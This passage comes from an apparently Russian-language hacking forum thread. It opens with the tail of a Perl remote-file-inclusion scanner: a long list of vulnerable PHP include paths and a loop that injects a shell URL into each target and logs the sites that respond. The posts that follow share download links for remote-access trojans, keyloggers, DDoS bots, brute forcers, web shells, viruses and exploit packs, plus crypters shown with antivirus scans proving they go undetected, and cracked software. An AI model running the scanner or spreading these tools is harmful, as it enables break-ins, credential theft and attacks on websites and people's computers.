$vuln259="phpBazar/classified_right.php?language_dir=";
$vuln260="chat/messagesL.php3?cmd=";
$vuln261="phpMyChat/chat/messagesL.php3?cmd=";
$vuln262="bbs/include/write.php?dir=";
$vuln263="visitorupload.php?cmd=";
$vuln264="modules/center/admin/accounts/process.php?module_path]=";
$vuln265="index.php?template=";
$vuln266="armygame.php?libpath=";
$vuln267="lire.php?rub=";
$vuln268="pathofhostadmin/?page=";
$vuln269="apa_phpinclude.inc.php?apa_module_basedir=";
$vuln270="index.php?req_path=";
$vuln271="research/boards/encapsbb-0.3.2_fixed/index_header.php?root=";
$vuln272="Farsi1/index.php?archive=";
$vuln273="index.php?archive=";
$vuln274="show_archives.php?template=";
$vuln275="forum/include/common.php?pun_root=";
$vuln276="pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=";
$vuln277="vuln.php?=";
$vuln278="cgi-bin//include/write.php?dir=";
$vuln279="admin/common.inc.php?basepath=";
$vuln280="pm/lib.inc.php?sfx=";
$vuln281="pm/lib.inc.php?pm_path=";
$vuln282="artmedic-kleinanzeigen-path/index.php?id=";
$vuln283="osticket/include/main.php?include_dir=";
$vuln284="include/main.php?config[search_disp]=include_dir=";
$vuln285="phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=";
$vuln286="quick_reply.php?phpbb_root_path=";
$vuln287="zboard/include/write.php?dir=";
$vuln288="admin/plog-admin-functions.php?configbasedir=";
$vuln289="content.php?content=";
$vuln290="q-news.php?id=";
$vuln291="_conf/core/common-tpl-vars.php?confdir=";
$vuln292="votebox.php?VoteBoxPath=";
$vuln293="al_initialize.php?alpath=";
$vuln294="include/db.php?GLOBALS[rootdp]=";
$vuln295="modules/news/archivednews.php?GLOBALS[language_home]=";
$vuln296="protection.php?siteurl=";
$vuln297="modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=";
$vuln298="index2.php?includes_dir=";
$vuln299="classes.php?LOCAL_PATH=";
$vuln300="extensions/moblog/moblog_lib.php?basedir=";
$vuln301="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$vuln302="phpWebLog/include/init.inc.php?G_PATH=";
$vuln303="admin/objects.inc.php4?Server=";
$vuln304="trg_news30/trgnews/install/article.php?dir=";
$vuln305="block.php?Include=";
$vuln306="arpuivo.php?data=";
$vuln307="setup/index.php?GALLERY_BASEDIR=";
$vuln308="include/help.php?base=";
$vuln309="index.php?[Home]=";
$vuln310="block.php?Include=";
$vuln311="examples/phonebook.php?page=";
$vuln312="PHPNews/auth.php?path=";
$vuln313="include/print_category.php?dir=";
$vuln314="skin/zero_vote/login.php?dir=";
$vuln315="skin/zero_vote/setup.php?dir=";
$vuln316="skin/zero_vote/ask_password.php?dir=";
$vuln317="gui/include/sql.php?include_path=";
$vuln318="webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=";
$vuln319="email.php?login=cer_skin=";
$vuln320="PhotoGal/ops/gals.php?news_file=";
$vuln321="index.php?custom=";
$vuln322="loginout.php?cutepath=";
$vuln323="oneadmin/config.php?path[docroot]=";
$vuln324="xcomic/initialize.php?xcomicRootPath=";
$vuln325="skin/zero_vote/setup.php?dir=";
$vuln326="skin/zero_vote/error.php? dir=";
$vuln327="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$vuln328="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$vuln329="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$vuln330="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$vuln331="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$vuln332="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$vuln333="src/index_overview.inc.php?config[path_src_include]=";
$vuln334="src/index_leftnavbar.inc.php?config[path_src_include]=";
$vuln335="src/index_image.inc.php?config[path_src_include]=";
$vuln336="src/image-gd.class.php?config[path_src_include]=";
$vuln337="src/image.class.php?config[path_src_include]=";
$vuln338="src/album.class.php?config[path_src_include]=";
$vuln339="src/show_random.inc.php?config[path_src_include]=";
$vuln340="src/main.inc.php?config[path_src_include]=";
$vuln341="src/index_passwd-admin.inc.php?config[path_admin_include]=";
$vuln342="yappa-ng/src/index_overview.inc.php?config[path_src_include]=";
$vuln343="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$vuln344="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$vuln345="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$vuln346="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$vuln347="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$vuln348="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$vuln349="src/index_overview.inc.php?config[path_src_include]=";
$vuln350="src/image-gd.class.php?config[path_src_include]=";
$vuln351="src/image.class.php?config[image_module]=";
$vuln352="src/album.class.php?config[path_src_include]=";
$vuln353="src/show_random.inc.php?config[path_src_include]=";
$vuln353="src/main.inc.php?config[path_src_include]=";
$vuln354="includes/db_adodb.php?baseDir=";
$vuln355="includes/db_connect.php?baseDir=";
$vuln356="includes/session.php?baseDir=";
$vuln357="modules/projects/gantt.php?dPconfig[root_dir]=";
$vuln358="modules/projects/gantt2.php?dPconfig[root_dir]=";
$vuln359="modules/projects/vw_files.php?dPconfig[root_dir]=";
$vuln360="modules/admin/vw_usr_roles.php?baseDir=";
$vuln361="modules/public/calendar.php?baseDir=";
$vuln362="modules/public/date_format.php?baseDir=";
$vuln363="modules/tasks/gantt.php?baseDir=";
$vuln364="mantis/login_page.php?g_meta_include_file=";
$vuln365="phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=";
$vuln366="modules/My_eGallery/public/displayCategory.php?basepath=";
$vuln367="dotproject/modules/files/index_table.php?root_dir=";
$vuln368="nukebrowser.php?filnavn=";
$vuln369="bug_sponsorship_list_view_inc.php?t_core_path=";
$vuln370="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$vuln371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";
$vuln372="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$vuln373="includes/calendar.php?phpc_root_path=";
$vuln374="includes/setup.php?phpc_root_path=";
$vuln375="phpBB/admin/admin_styles.php?mode=";
$vuln376="aMember/plugins/db/mysql/mysql.inc.php?config=";
$vuln377="admin/lang.php?CMS_ADMIN_PAGE=";
$vuln378="inc/pipe.php?HCL_path=";
$vuln379="include/write.php?dir=";
$vuln380="becommunity/community/index.php?pageurl=";
$vuln381="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln382="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$vuln383="modules/agendax/addevent.inc.php?agendax_path=";
$vuln384="shoutbox/expanded.php?conf=";
$vuln385="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln386="index.php?page=";
$vuln387="index.php?pag=";
$vuln388="index.php?include=";
$vuln389="index.php?content=";
$vuln390="index.php?cont=";
$vuln391="index.php?c=";
$vuln392="modules/My_eGallery/index.php?basepath=";
$vuln393="modules/newbb_plus/class/forumpollrenderer.php?bbPath=";
$vuln394="journal.php?m=";
$vuln395="index.php?m=";
$vuln396="links.php?c=";
$vuln397="forums.php?m=";
$vuln398="list.php?c=";
$vuln399="user.php?xoops_redirect=";
$vuln400="index.php?id=";
$vuln401="r.php?url=";
$vuln402="CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=";
$vuln403="inc/formmail.inc.php?script_root=";
$vuln404="include/init.inc.php?G_PATH=";
$vuln405="backend/addons/links/index.php?PATH=";
$vuln406="modules/newbb_plus/class/class.forumposts.php?bbPath[path]=";
$vuln407="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$vuln408="protection.php?siteurl=";
$vuln409="htmltonuke.php?filnavn=";
$vuln410="mail_autocheck.php?pm_path=";
$vuln411="index.php?p=";
$vuln412="modules/4nAlbum/public/displayCategory.php?basepath=";
$vuln413="e107/e107_handlers/secure_img_render.php?p=";
$vuln414="include/new-visitor.inc.php?lvc_include_dir=";
$vuln415="community/modules/agendax/addevent.inc.php?agendax_path=";
$vuln416="library/editor/editor.php?root=";
$vuln417="library/lib.php?root=";
$vuln418="zentrack/index.php?configFile=";
$vuln419="pivot/modules/module_db.php?pivot_path=";
$vuln420="myPHPCalendar/admin.php?cal_dir=";
$vuln421="index.php/main.php?x=";
$vuln422="os/pointer.php?url=";
$vuln423="p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=";
$vuln424="db.php?path_local=";
$vuln425="phpGedView/individual.php?PGV_BASE_DIRECTORY=";
$vuln426="index.php?kietu[url_hit]=";
$vuln427="phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=";
$vuln428="Sources/Packages.php?sourcedir=";
$vuln429="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$vuln430="cgi-bin//gadgets/Blog/BlogModel.php?path=";
$vuln431="Gallery/displayCategory.php?basepath=";
$vuln432="load_phplib.php?_PHPLIB[libdir]=";
$vuln433="main_prepend.php?_SERWEB[functionsdir]=";
$vuln434="load_lang.php?_SERWEB[configdir]=";



for ($i=1;$i<435;$i++)

{

$cont=vuln.$i;
chomp $cont;

print "$cont\n";

$final=$host.$$cont."$shell?";
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

if ($response->is_success) {
if( $response->content =~ /$string/){
open(FILE,">>results.txt");
print FILE "$final\n";
close(FILE);
print "-------------------------------------------------\n";
print "$final\n";
print "IS VULNZ..\n";
print "-------------------------------------------------\n";
}}

}


xHacker Crypter
http://rapidshare.com/files/77124872/xhacker_crypter.rar

IRC IP grabber
http://rapidshare.com/files/77691770/irc_ip_grabber.exe.html

Fierce Domain Scan
http://ha.ckers.org/fierce/

HAC Downloader
http://www.fileshare.ro/462098240.18

LORD Password Sender 2.0
http://w15.easy-share.com/12138421.html

VNC Mini-Backdoor
http://rapidshare.com/files/51381520/VNC_Mini-Backdoor.rar

Bifrost 1.2b Private Build

Код
Antivirus Version Last Update Result
AhnLab-V3 2007.11.10.0 2007.11.09 -
AntiVir 7.6.0.34 2007.11.09 -
Authentium 4.93.8 2007.11.10 -
Avast 4.7.1074.0 2007.11.10 -
AVG 7.5.0.503 2007.11.10 -
BitDefender 7.2 2007.11.10 DeepScan:Generic.Malware.SE!dldg.24CDB148
CAT-QuickHeal 9.00 2007.11.10 -
ClamAV 0.91.2 2007.11.11 -
DrWeb 4.44.0.09170 2007.11.10 -
eSafe 7.0.15.0 2007.11.08 Suspicious File
eTrust-Vet 31.2.5284 2007.11.09 -
Ewido 4.0 2007.11.10 -
FileAdvisor 1 2007.11.11 -
Fortinet 3.11.0.0 2007.10.19 -
F-Prot 4.4.2.54 2007.11.10 -
F-Secure 6.70.13030.0 2007.11.10 -
Ikarus T3.1.1.12 2007.11.10 -
Kaspersky 7.0.0.125 2007.11.11 Heur.Invader
McAfee 5160 2007.11.09 -
Microsoft 1.3007 2007.11.11 -
NOD32v2 2651 2007.11.10 -
Norman 5.80.02 2007.11.09 -
Panda 9.0.0.4 2007.11.10 -
Prevx1 V2 2007.11.11 -
Rising 20.17.52.00 2007.11.10 -
Sophos 4.23.0 2007.11.11 -
Sunbelt 2.2.907.0 2007.11.09 -
Symantec 10 2007.11.10 -
TheHacker 6.2.9.123 2007.11.10 -
VBA32 3.12.2.4 2007.11.06 -
VirusBuster 4.3.26:9 2007.11.10 -
Webwasher-Gateway 6.0.1 2007.11.10 Win32.Malware.gen!88 (suspicious)


http://rapidshare.com/files/69389028/Bifrost_1.2b_Private_Build.rar

DiGi-Binder [PRIVATE]
http://rapidshare.com/files/75114043/digibinder.rar

Biohazard RAT 0.0.1.1 Alpha
http://www.fileshare.ro/455624465.805

DownTroj v0.1

Код
DownTroj is a trojan horse with following features:
- remote messagebox
- remote info
- remote file browser (+ download, upload, delete, make/del dir)
- remote shell
- remote task manager (+ start/kill)
- remote keylogger
- remotely reboot or shutdown system

Coded in C/C++ and also has:
- reverse connection (bypasses routers)
- more victims at the same time
- unlimited number of hosts/ports to connect to
- installing into location where its impossible to access with windows explorer
- UD startup method via registry (but not CurrentVersion\Run :p)
- task manager process hidder
- windows firewall bypass
http://"%20download



d4rK_z0n3 keylogg3R
http://www.fileshare.ro/458103153.605

CODE
Trojan Horses
- Yuri RAT v1.2
- MofoTro v1.7 BETA
- Charon
- Beast v2.0.7
- Omerta v1.3
- Theef v2.10
- Combined Forces R.A.T
- MoSucker v3.0
- ProRat v1.9 Fix2
- Subseven v2.2
- Girlfriend v1.35
- Back Attack 1.8
- Turkojan v3

Keyloggers
- Elite Keylogger v1.0
- SKL v0.1
- KeySpy v2.0
- A++++
- Curiosity
- Keylogger
- KeyCopy

Binders
- Daemon Crypt Public v2
- NT Packer v2.1
- EES binder v1.0
- File Injector v3
- Bytes Adder
- FreshBind v2.01
- YAB v2.01
- NakedBind v1.0
- Amok Joiner

WebHacks/WordLists

Brute Forcers
- Munga Bunga 's Official
- Brutus - Authentication Engine Test 2
- wwwHack v1.946
- FTP Brute Hacker
- FTP Brute Forcer.tar.gz - Unix
- Wbrute.tar.gz - Unix
- Shadow Scanner-Brute Forcer
- Hackers Utility v1.5
- POP3 brute forcer - Unix

CGI-Bug Scanners
- NStealth HTTP Security Scanner v5.8
- Attack Toolkit v4.1 & source code included
- Scanarator
- Legion NetBios Scanner v2.1
- NetView v1.0
- CGI Vulnerability Scan
- CGI Scanner v4.0
- VoidEye CGI scanner

PHP Shells
- Cyper Eye 5 (asp)
- Rootshell (php)
- r57Shell (php)
- backdoor (php)
- Indexer (asp)
- NT Daddy (asp)
- NST View (php)
- REM View (php)
- C99Shell (php)
- AjanShell (asp)
- CASUS (php)

RFI & RCE
- XML-RPC Scanner & Exploiter
- PHPAttacker
- phpinjection scan exploit 2006 v2
- iis5dav scan exploit 2006 v2

SQL InjecTion & XSS TooLz
- SQLRecon
- SQLVulnscan
- Casi v4.0
- ForceSQL
- SQLPing 2
- SQL-XSS Tool
- SQL Bruteforce

Apache Hacking TooLz
- Apache Chunked Scanner
- Apache Hacker Tool v 2.0
- Apache h4x0r

Viruses
- Hippi virus
- Sasser
- W32. Blaster .Worm
- Midnight Massacre
- 00001
- Nimda
- Loveletter virus
- Happy '99
- MXZ

Virus Builders
- DR VBS
- VBSwg 2 beta - Virus builder
- p0ke's WormGen 2.0
- RESIDUO - DoS Virus

MSN Hacks & Bots
- HoaX Toolbox 1.1
- MSN Extreme 3.0
- MessenPass v1.06
- Advanced Blood Scroller
- Nudge Madness
- Advanced Instant Messengers Password Recovery
- Contact Spy
- Msn Explosion
- Encrypted Messenger

Port & IP Scanners
- Blues Port Scanner
- ProPort v2.2
- SuperScan v3.0
- Net Scan Tools v4.2
- LanSpy v2.0
- Bitchin Threads v3.1
- Trojan Hunter v1.5
- SuperScan v4.0
- Neotrace PRO v3.25 trial&crack

Nukers And Flooders
- Rocket v1.0
- RPCNuke v1.0
- Panther Mode1 - 56k
- Panther Mode2 - ISDN +
- Final Fortune v2.4
- Battle Pong - Technophoria
- Assault v1.0
- ICMP Nuker
- CLICK v2.2

Exploits
- Internet Explorer CSS Exploit
- Jpeg of death
- WMF maker
- MS04011 lsasrv.dll rpc auto hacker v2
- Windows WMF Download and Exec Exploit
- WINRAR 3.41 corrupt zip file (Proof of Concept)
- MPACK
- ICE PACK

Packers & Encrypters
- Themida
- Morphine

PsTools is a Tool Pack from sysinternals (Microsoft)

EXTRA!
- Telnet Tutorial
- The Giant Black Book of Computer Viruses
- Great Tutorials Pack
http://24.161.50.41/Hacker%20Tools%20and%20Exploits/UltimateHacking2007.rar.pass-hacksector


Dollarwarez.com acct gen
http://www.st0r3.com/download.php?id=F138C0231

Автор: Creeping Death 4.01.2008, 12:15

Лошади

FEAR
http://rapidshare.com/files/79681740/FearRAT.rar

Remote Format
http://rapidshare.com/files/78099920/RemoteFormat.ZIP.html
http://www.speedyshare.com/424250846.html
http://www.2shared.com/file/2627377/5e5a1bf7/RemoteFormat.html

RubyRAT
http://rapidshare.com/files/78613630/RubyRAT_1.0.rar.html
http://www.speedyshare.com/139655371.html

CIA 1.3
http://www.speedyshare.com/395687916.html

Char0n
http://rapidshare.com/files/81050270/Char0n.rar.html

Poison ivy 2.30
http://rapidshare.com/files/67251269/poison_ivy_2.30.rar.html

HaCkEdSs RAT
CLIENTU
http://rapidshare.com/files/81068417/HaCkEdSs_CLIENT.rar
SERVERU
http://rapidshare.com/files/81068456/HaCkEdSs_Server.rar

Binder&Crypter

h4ck-y0u_Crypt[new]
http://rapidshare.com/files/76933550/h4ck-y0u.rar.html

Spider Binder 1.2
http://rapidshare.com/files/77600505/Spider_Binder_1.2.rar.html

Binders Pack

Код
AFX Executable Binder PRO
-Amok Joiner
-Asylum Binder
-Binder
-BlackCore File Binder
-Blade Stoner 1.5
-BTS Binder
-Crucified 1.2
-Djoiner 1.3
-Deception v4.0
-Droopy Binder 1.0
-EES Binder 1.0
-exe,jpg,doc File Binder
-Exebinder v2.5
-F.B.I
-File Injector v3
-Fresh Bind
-Freshbind v2.01
-Frusion v1.0
-HelioS Binder v1.0c
-Hook Toolbox
-IDE Spinner
-Inbinder v1.0
-Interlaced II v1.00
-J-BiNdEr
-M3Byter
-MBinder
-Multi Binder 1.4.1
-MVM v1.0
-NakedBind v1.0
-Newjoin
-NG Binder Pro
-Nightwolf Binder 1.0 Alpha
-OverDoz 2
-Pretator v1.6
-Reductor 1.0b (Beta 4)
-Rephlex Binder 0.2
-SCD 1.0
-Silk Rope v2.0 (Binaries and Source)
-ToP GUI Full 2.0
-Trendy Nigger 1.0b
-X-Exe Joiner
-YAB (Yet Another Binder)


http://rapidshare.com/files/38856990/Binders.rar

TheDefaced Predator v1.6
http://rapidshare.com/files/78139716/Deface_Predator.rar.html
http://www.speedyshare.com/955667959.html

PI 2.1.4
http://rapidshare.com/files/78310321/PI_2.1.4_Private_.rar.html

Useless Binder
http://rapidshare.com/files/80479258/Useless.exe

UnThemida v2

http://rapidshare.com/files/77976403/UnThemida_2.0.rar.html




Автор: Xeta123 13.01.2008, 19:21

Immunity Canvas v2

Иммунитет в CANVAS предоставляет сотни подвиги, эксплуатация автоматизированной системы, и всеобъемлющей, надежной эксплуатации рамки развития тестеров для проникновения и специалистов по вопросам безопасности во всем мире.

Цитата
hXXp://rapidshare.com/files/56812828/immunity_canvas-2.rar


Core Impact v4

ОСНОВНЫЕ ПОСЛЕДСТВИЯ является наиболее полным продуктом для оценки вашей организации возможности для выявления, предотвращения и реагирования на угрозы информационной безопасности. К безопасно воспроизведение реального мира нападений сетевых серверов и рабочих станций, конечных пользователей систем, и веб-приложений, IMPACT позволяет найти и устранить проблемы безопасности, прежде чем данные инциденты происходят.

Цитата
hXXp://rapidshare.com/files/76874551/coreimpactv4.rar


Автор: nikhak 13.02.2008, 12:19

народ подскажите где взять NetScan Tools pro или manual по superscan

Автор: StuDY 18.02.2008, 01:22

Народ,подскажите софтину или скрипт может у кого есть,который собирает с сайта ссылки с переменными.

Автор: Creeping Death 25.02.2008, 23:14

FUD Crypter

Цитата
Antivirus Version Last Update Result
AhnLab-V3 2008.2.4.10 2008.02.04 -
AntiVir 7.6.0.62 2008.02.04 -
Authentium 4.93.8 2008.02.04 -
Avast 4.7.1098.0 2008.02.03 -
AVG 7.5.0.516 2008.02.04 -
BitDefender 7.2 2008.02.04 -
CAT-QuickHeal 9.00 2008.02.01 -
ClamAV 0.92 2008.02.04 -
DrWeb 4.44.0.09170 2008.02.04 -
eSafe 7.0.15.0 2008.01.28 -
eTrust-Vet 31.3.5509 2008.02.04 -
Ewido 4.0 2008.02.04 -
FileAdvisor 1 2008.02.04 -
Fortinet 3.14.0.0 2008.02.04 -
F-Prot 4.4.2.54 2008.02.03 -
F-Secure 6.70.13260.0 2008.02.04 -
Ikarus T3.1.1.20 2008.02.04 -
Kaspersky 7.0.0.125 2008.02.04 -
McAfee 5221 2008.02.01 -
Microsoft 1.3204 2008.02.04 -
NOD32v2 2846 2008.02.04 -
Norman 5.80.02 2008.02.01 -
Panda 9.0.0.4 2008.02.04 -
Prevx1 V2 2008.02.04 -
Rising 20.29.22.00 2008.01.30 -
Sophos 4.26.0 2008.02.04 -
Sunbelt 2.2.907.0 2008.02.02 -
Symantec 10 2008.02.04 -
TheHacker 6.2.9.208 2008.02.04 -
VBA32 3.12.6.0 2008.02.03 -
VirusBuster 4.3.26:9 2008.02.03 -
Webwasher-Gateway 6.6.2 2008.02.04 -
Additional information
File size: 307200 bytes
MD5: b39c433fbca0c4621c4c5e5fcf3bb5fa
SHA1: 537eb79d71fedcd66b8c46f24400e4eed4def565
PEiD: -

Password: tool-base


http://rapidshare.com/files/89733247/CC_-_CraniumCrypt.rar.html

Hell Binder [BUN]
http://rapidshare.com/files/88653905/HELL_1_CRYPTER__UNdetected__.rar.html

Kit Binders
Цитата
-antidote_v1.2_osce
-chinaprotect 0.3
-mucki_s_protector
-sexecrypter_with_udstub
-Super_Binder
-topo12
====
Pass:
filefusion

http://www.megaupload.com/?d=2OLHREVT

Автор: ter10n 21.03.2008, 16:33

Mail.ru Web Brut - 2.0 by F1reF0x



Хороший брут, пока быстрый.

http://rapidshare.com/files/101199733/bc7d68ff3Mailruwebbrut.rar.html

Автор: life_is_shit 27.03.2008, 21:57

ищу Web Icq Bot shell, выполняет функции шелла через протокол icq на win-системе.
заранее спасибо.

Автор: ter10n 9.04.2008, 21:33

Simple FTP check v0.1 by Psixo

Простой ФТП чеккер который пришлось написать для своих нужд. Необходимо было быстро и удобно прочекать около 10000 ФТП (фриихосты), а консольные решения, которые были, меня не устраивали, т.к. сортировка шла пачками по несколько сотен ФТП, то заносить их в отдельный файл,заново пускать чекк (пусть и многопоточный) - не удобно.



Просто засовываем список ФТП и жмём кнопку Check . Стартует процесс проверки проксей, при желании окно с выводом инфы о статусе чекка можно закрыть,проверка не остановится, она будет идти пока не закончаться все FTP. Надо лишь изредка заглядывать на страницу и смотреть каковы результаты.

Дополнительно справа размещены ссылки на файлы с результатами (Good FTP list и Bad FTP list). Ниже них находится ссылка для удаления одинаковых ФТП из файлов, т.е. дубляжей - Delete repetitions. И ссылка для очистки файлов с результатами Clean files.

Перед использование верно раставьте права на файлы в которые будут помещаться результаты!

Права:
chmod 777 ftp_bad.txt;
chmod 777 ftp_good.txt; © Psixo

 ftp_cheker_v0_1.zip ( 2,99 килобайт ) : 27



Автор: life_is_shit 16.04.2008, 04:08

Цитата(life_is_shit @ 27.03.2008, 21:57) *
ищу Web Icq Bot shell, выполняет функции шелла через протокол icq на win-системе.
заранее спасибо.


найдено, кому надо смотрим здесь h__p://cdaem.ru/Win_Bot.exe (з.ы. не проверено)

Автор: KABALLL 17.05.2008, 02:38

Цитата(неузнаваемый @ 25.05.2007, 03:31) *
Illusion Ddos bot 1.1

В архиве: хелп, ридми, крякнутый билдер, некрякнутый билдер (во вложеном архиве), пустой сервер бота.



<!--private_data=0-->

http://damagelab.org

Статья по настройке http://team-madalf.com/index.php?showtopic=42612&view=getnewpost
пасс <!--private_data=1-->

Здарова!!!Ты незнаеш какой код у Ddosbota?


Люди подскажите пароль к Ddos.bot?

Автор: Natali V 2.06.2008, 17:35

Цитата(@llexxxei @ 11.04.2007, 14:58) *
Вскрываем *.rar
<!--private_data=0-->

kid.gif

как вскрыть запароленный rar

помогите пожалуйста

Автор: MadDog 2.06.2008, 18:02

Цитата(Natali V @ 2.06.2008, 18:35) *
kid.gif

как вскрыть запароленный rar

помогите пожалуйста

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.


Автор: Hroft_clone3 3.06.2008, 17:11

Народ, нужен последний Advanced Office Password Recovery от Elcomsofta, весь форум перерыл, живых линков не нашел :(

Автор: MASKA 24.06.2008, 15:08

QUOTE(Natali V @ 2.06.2008, 19:35) *
kid.gif

как вскрыть запароленный rar

помогите пожалуйста

если длина пароля около 8 то шансов найти пароль очень мало...

QUOTE(Hroft_clone3 @ 3.06.2008, 19:11) *
Народ, нужен последний Advanced Office Password Recovery от Elcomsofta, весь форум перерыл, живых линков не нашел :(

Вот ссылки, раньше работали пробуй
http://www.ftp2share.com/file/0e355040-4d66-4130-8681-45a1befac6c3/Advanced.Office.Password.Recovery.Professional.v4.0-YAG.rar.html
http://rapidshare.com/files/66058392/aoprp4-yag.zip.html

Автор: Hroft_clone3 25.06.2008, 13:14

Цитата(MASKA @ 24.06.2008, 16:08) *
если длина пароля около 8 то шансов найти пароль очень мало...
Вот ссылки, раньше работали пробуй
http://www.ftp2share.com/file/0e355040-4d66-4130-8681-45a1befac6c3/Advanced.Office.Password.Recovery.Professional.v4.0-YAG.rar.html
http://rapidshare.com/files/66058392/aoprp4-yag.zip.html


Спасибо, но, увы, везде поудаляли :(

Автор: MadDog 25.06.2008, 14:48

Цитата(Hroft_clone3 @ 25.06.2008, 14:14) *
Спасибо, но, увы, везде поудаляли :(

Не везде!!
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.

Автор: Hroft_clone3 25.06.2008, 16:23

Спасибо, наконец то smile.gif

Автор: lavis 8.07.2008, 19:07

Народ! Помогите! Нужен програмный РИП, точнее Epson 7600 RIP под винду, с лекарством

Автор: Cmucl 31.07.2008, 20:19

Нужен взломаный Xspider 7.7.Выложите у кого есть.

Автор: MYSTiQUE 18.08.2008, 16:11

Могу предложить XSpider v7.5 Full Build.1712 RUS

Автор: MYSTiQUE 12.09.2008, 13:28

Shell Bots Collection - PHP-CGI-ASP-Perl-Python-IRC-MySQL

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.

Автор: MadDog 13.09.2008, 13:00

Цитата(Cmucl @ 31.07.2008, 21:19) *
Нужен взломаный Xspider 7.7.Выложите у кого есть.

Поиск юзать не судьба????
http://team-madalf.com/index.php?showtopic=40726&hl=Xspider

Автор: draiver13 2.10.2008, 20:21

программка для декодирования телефонов по imei

если телефон заблокирован просто нажимаем в телефоне *#06# и переписываем из дисплея телефона в программу и генерируется код для разблокировки

http://depositfiles.com/files/8407047

Автор: Rim 11.10.2008, 12:25

DosHTTP 2.0

Интерфейс: Английский
Размер: 296 Кб
ОС: Windows
» Описание «

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.

Автор: MYSTiQUE 14.10.2008, 14:23

Охренительный фейк rapidshare.de smile.gif

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.

Автор: Rim 14.10.2008, 16:41

Crazy Mail 6

Интерфейс: Русский
Размер: 1.3 Мб
Лекарство: не требуется
ОС: Windows 95/98/ME/NT/2000/XP/2003/Vista

» Описание «

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.

Автор: HACKALL 17.10.2008, 23:11

Цитата(draiver13 @ 2.10.2008, 21:21) *
программка для декодирования телефонов по imei

если телефон заблокирован просто нажимаем в телефоне *#06# и переписываем из дисплея телефона в программу и генерируется код для разблокировки

http://depositfiles.com/files/8407047


Чет эта прога не запускается вообще..

Автор: DiZz3l 19.10.2008, 20:31



Cборник содержит самые необходимые программы и утилиты для хакера. Все представлено в удобной оболочке с фоновой музыкой.

Содержит следующий софт:
- Cain and Abel (сниффер)
- John the Ripper (мощный брутфорсер)
- NetStumbler (позволяет определить радиус действия сети WiFi
- в реальном времени на диаграмме можно увидеть величину полезного сигнала)
- Nmap (навороченый сетевой сканер)
- Putty (неплохой телнет клиент)
- SuperScan (мощный сканер TCP портов, pinger и hostname resolver)
- Hping (позволяет генерировать специальные ICMP/UDP/TCP пакеты и просматривать ответы пингуемого хоста в стиле обычной утилиты ping)
- Lcp (аудит и восстановление паролей Windows NT / 2000 / XP / 2003)
- Nikto (perl сканер уязвимостей Web сервера, с поддержкой SSL)
- Kismet (сниффер беспроводной сети 802.11 и дешифратор пакетов)

Размер: 56.53 МБ

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.

Автор: DiZz3l 19.10.2008, 20:51



Easy Rapidshare Points 3.0

Эта программа пригодится для охотников за поинтами на rapidshare. Не секрет , что многие зарабатывают тем , что закачивают файлы на rapidshare и получают бонусы от скачек своих файлов. Это объясняет присылаемые новости на многие сайты. Чем больше скачек, тем больше поинтов у аплоадера. Easy Rapidshare Points будет сама скачивать ваши файлы как дармовой пользователь! Эдакий бот для rapidshare Программа качает - вы получаете поинты.

1 минута: 1 point
30 минут: 30 points
1 час: 60 points
1 день: 1,440 points
Месяц: 43,200 points

Скачать:

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.

Автор: Rim 22.10.2008, 13:54

KGB Employee Monitor 4.2.2

Интерфейс: Английский
Размер: 6.4Мб

» Описание «

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.


Автор: shurabal 2.11.2008, 20:19

Цитата(draiver13 @ 2.10.2008, 21:21) *
программка для декодирования телефонов по imei

если телефон заблокирован просто нажимаем в телефоне *#06# и переписываем из дисплея телефона в программу и генерируется код для разблокировки

http://depositfiles.com/files/8407047

Почему прога не запускается?

Автор: MYSTiQUE 11.11.2008, 17:21

Win32 SHELLCODE CONSTRUCTOR
от z0mbie


Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.


 shc102.zip ( 282,69 килобайт ) : 16
 

Автор: Gerzog 13.11.2008, 05:32

Цитата(DiZz3l @ 19.10.2008, 21:51) *


